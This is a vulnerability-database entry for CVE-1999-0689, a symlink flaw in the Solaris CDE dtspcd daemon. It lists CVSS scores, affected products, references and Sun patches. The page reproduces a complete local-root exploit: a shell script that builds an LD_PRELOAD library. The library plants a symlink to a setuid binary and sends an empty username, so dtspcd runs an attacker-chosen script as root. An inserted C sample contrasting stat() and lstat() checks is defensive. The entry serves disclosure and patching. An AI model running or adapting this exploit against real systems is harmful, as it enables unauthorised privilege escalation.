CVE-1999-0689
CVSS 7.2
Published: 1999-09-13 00:00:00
Revised: 2008-09-09 08:35:13
NMCOE

[Original] The CDE dtspcd daemon allows local users to execute arbitrary commands via a symlink attack.


[CNNVD] Multiple vendor CDE dtspcd vulnerability (CNNVD-199909-025)

        A vulnerability exists in the CDE dtspcd daemon. Local users can execute arbitrary commands by means of a symbolic link.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files are exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:cde:cde:1.2
cpe:/a:cde:cde:2.0
cpe:/a:cde:cde:1.0.2
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/a:cde:cde:1.0.1
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/a:cde:cde:2.120
cpe:/o:sun:solaris:2.6::x86
cpe:/a:cde:cde:2.1
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1
cpe:/a:cde:cde:1.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1880  CDE dtspcd Daemon Symlink Vulnerability
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0689
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0689
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-025
(official data source) CNNVD

- Other links and resources

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9909-103
(UNKNOWN)  HP  HPSBUX9909-103
http://www.securityfocus.com/bid/636
(UNKNOWN)  BID  636
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/192
(UNKNOWN)  SUN  00192

- Vulnerability information

Multiple vendor CDE dtspcd vulnerability
High severity  Other
1999-09-13 00:00:00  2005-05-02 00:00:00
Local
        A vulnerability exists in the CDE dtspcd daemon. Local users can execute arbitrary commands by means of a symbolic link.

- Advisories and patches

        Updated SGI advisory (20021102-02-P) and fix details available.
        Sun Microsystems
        ------------------------
        CDE version   Platform   Patch ID
        -----------   --------   ---------
        1.3           sparc      108221-01
        1.3           x86        108222-01
        1.2           sparc      108199-01
        1.2_x86       x86        108200-01
        1.0.          sparc      108205-01
        1.0.2         x86        108206-01
        1.0.1         sparc      108252-01
        1.0.1         x86        108253-01
        Patches are available for all Sun customers at
        http://sunsolve.sun.com.
        Sun Solaris 2.5
          • Sun 108252-01
        Sun Solaris 2.5 _x86
          • Sun 108253-01
        Sun Solaris 2.5.1 _x86
          • Sun 108206-01
        Sun Solaris 2.5.1
          • Sun 108205-01
        Sun Solaris 2.6
          • Sun 108199-01
        Sun Solaris 2.6 _x86
          • Sun 108200-01
        Sun Solaris 7.0
          • Sun 108221-01
        Sun Solaris 7.0 _x86
          • Sun 108222-01

- Vulnerability information (19498)

Common Desktop Environment <= 2.1 20, Solaris <= 7.0 dtspcd Vulnerability (EDBID:19498)
multiple local
1999-09-13 Verified
0 Job de Haas of ITSX
N/A
source: http://www.securityfocus.com/bid/636/info

This explanation is quoted from the initial post on this problem by Job de Haas. This message is available in its entirety in the 'Credit' section of this vulnerability entry.

The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Furthermore, the daemon seems to allow empty usernames and then reverts to a publicly writable directory (/var/dt/tmp).
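The two defects described above (a stat()-based owner check that follows symlinks, and an empty username falling back to a shared directory) are contrasted with a hardened check in the following C program. This is an added illustration, not code from the advisory or from the exploit below; the verdict codes, the function names and the temporary directory layout are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Verdicts of the authentication-file check (constructed for this demo). */
enum { AUTH_OK, AUTH_EMPTY_USER, AUTH_NO_FILE, AUTH_SYMLINK,
       AUTH_NOT_REGULAR, AUTH_WRONG_OWNER };

/* Vulnerable pattern from the advisory: stat() follows a symlink, so the
 * owner of the link's target, not of the link itself, is what gets compared. */
int check_with_stat(const char *path, uid_t client_uid)
{
    struct stat st;
    if (stat(path, &st) != 0) return AUTH_NO_FILE;
    return st.st_uid == client_uid ? AUTH_OK : AUTH_WRONG_OWNER;
}

/* Hardened pattern: refuse an empty username (no fallback to a shared directory),
 * use lstat() so a symlink is seen as one, and require a regular file owned by the client. */
int check_with_lstat(const char *user, const char *path, uid_t client_uid)
{
    struct stat st;
    if (user == NULL || *user == '\0') return AUTH_EMPTY_USER;
    if (lstat(path, &st) != 0) return AUTH_NO_FILE;
    if (S_ISLNK(st.st_mode)) return AUTH_SYMLINK;
    if (!S_ISREG(st.st_mode)) return AUTH_NOT_REGULAR;
    return st.st_uid == client_uid ? AUTH_OK : AUTH_WRONG_OWNER;
}

/* Constructed scenario: a regular file we own plus a symlink to it in a fresh
 * temporary directory. Fills both verdicts for the symlink path, cleans up,
 * and returns 1 on success or 0 if setup failed. */
int demo_symlink_verdicts(int *stat_verdict, int *lstat_verdict)
{
    char dir[] = "/tmp/spcdemo.XXXXXX";
    char file[64], link[64];
    int fd;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(file, sizeof file, "%s/real", dir);
    snprintf(link, sizeof link, "%s/SPC_auth", dir);
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return 0;
    close(fd);
    if (symlink(file, link) != 0) return 0;
    *stat_verdict = check_with_stat(link, getuid());   /* link passes: stat() followed it */
    *lstat_verdict = check_with_lstat("alice", link, getuid()); /* link is rejected */
    unlink(link); unlink(file); rmdir(dir);
    return 1;
}
```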

#!/bin/sh
#
# dtspaced
# Demonstration of local root hole with dtspcd.
# Job de Haas
# (c) 1999 ITSX bv
#
# Mechanism is as follows:
# - dtaction requests the action 'Execute' through dtspcd.
# - dtspcd requests a filename to be created which it will check for
#   owner/suid bit.
# - BUG1: dtspcd allows creation in a public directory (with empty
#   username).
# - BUG2: and forgets to check if the file is a symlink.
# - dtaction will create a symlink to a suid root binary and reply.
# - dtspcd considers dtaction authenticated and executes requested file
#   as root.
#
# suggested fix: use lstat or refuse a symlink and why allow an empty
# username?
#
# exploit uses a shared lib to replace some functions to do what we want.
# Note that these are not used by dtspcd but by dtaction. The script executed
# by dtaction as root creates a file /tmp/root_was_here.
#
# tested on Solaris 2.5.1, 2.6 and 7
#

if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then
    echo "/tmp/root_was_here already exists"
    exit
fi

if [ "X$DISPLAY" = "X" ]; then
    echo "need to set DISPLAY"
    exit
fi

cat > /tmp/dtspaced.c << EOF
#include <pwd.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define O_CREAT 0x100
#define O_RDONLY 0

#if __SunOS_5_5_1
#define open64 open
#define _open64 _open
#endif

/* Solaris libc internal entry points the wrappers below fall through to. */
extern int _open64(const char *, int, int);
extern int _chmod(const char *, int);
extern struct passwd *_getpwuid(uid_t);

/* dtaction creates the SPC authentication file through open64(); a symlink
 * is planted at that name instead, and the real open is redirected elsewhere. */
int open64(const char * filename, int flag, int mode)
{
    if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) {
        symlink( "/usr/bin/passwd", filename);
        filename = (char *)strdup("/tmp/shit");
        unlink(filename);
    }
    return(_open64(filename, flag, mode));
}

/* chmod() on the symlink must not report failure back to dtaction. */
int chmod(const char * filename, int mode)
{
    _chmod( filename, mode);
    return(0);
}

/* Return an empty username so dtspcd falls back to the public directory (BUG1). */
struct passwd *getpwuid(uid_t uid)
{
    struct passwd *pw;

    pw = (struct passwd *)_getpwuid(uid);
    pw->pw_name = (char *)strdup("");
    return(pw);
}
EOF

cat > /tmp/doit << EOF
#!/bin/sh
unset LD_PRELOAD
/usr/bin/touch /tmp/root_was_here
EOF

chmod a+x /tmp/doit

mkdir /tmp/.dt
cat > /tmp/.dt/hack.dt << EOF

set DtDbVersion=1.0

ACTION Execute
{
    LABEL           Execute
    TYPE            COMMAND
    WINDOW_TYPE     NO_STDIO
    EXEC_STRING     "%(File)Arg_1"File To Execute:"%"
    DESCRIPTION     The Execute action runs a shell script or binary executable. It prompts for options and arguments, and then executes the script or executable in a terminal window.
}
EOF

DTDATABASESEARCHPATH=/tmp/.dt
export DTDATABASESEARCHPATH

# make a copy of dtaction so it is not suid root and will accept LD_PRELOAD
cp /usr/dt/bin/dtaction /tmp

echo "Compiling shared lib..."
cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o
ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so

LD_PRELOAD=/tmp/dtspaced.so
export LD_PRELOAD

echo "Executing dtaction..."
/tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit
unset LD_PRELOAD

/bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*
/bin/rm -rf /tmp/.dt

if [ -f /tmp/root_was_here ]; then
    echo "created file /tmp/root_was_here"
else
    echo "exploit failed..."
fi

- Vulnerability information

1072
Multiple Vendor CDE dtspcd Symlink Arbitrary Privileged Command Execution
Local Access Required  Race Condition
Loss of Integrity  Patch / RCS
Exploit Public  Vendor Verified

- Vulnerability description

- Timeline

1999-09-13 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released patches to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete